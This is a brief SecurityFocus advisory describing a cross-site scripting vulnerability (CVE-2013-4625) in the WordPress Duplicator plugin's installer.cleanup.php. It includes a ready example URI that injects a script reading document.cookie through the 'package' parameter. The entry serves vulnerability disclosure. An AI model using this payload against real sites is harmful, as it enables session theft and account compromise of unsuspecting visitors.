WordPress Duplicator Plugin CVE-2013-4625 Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus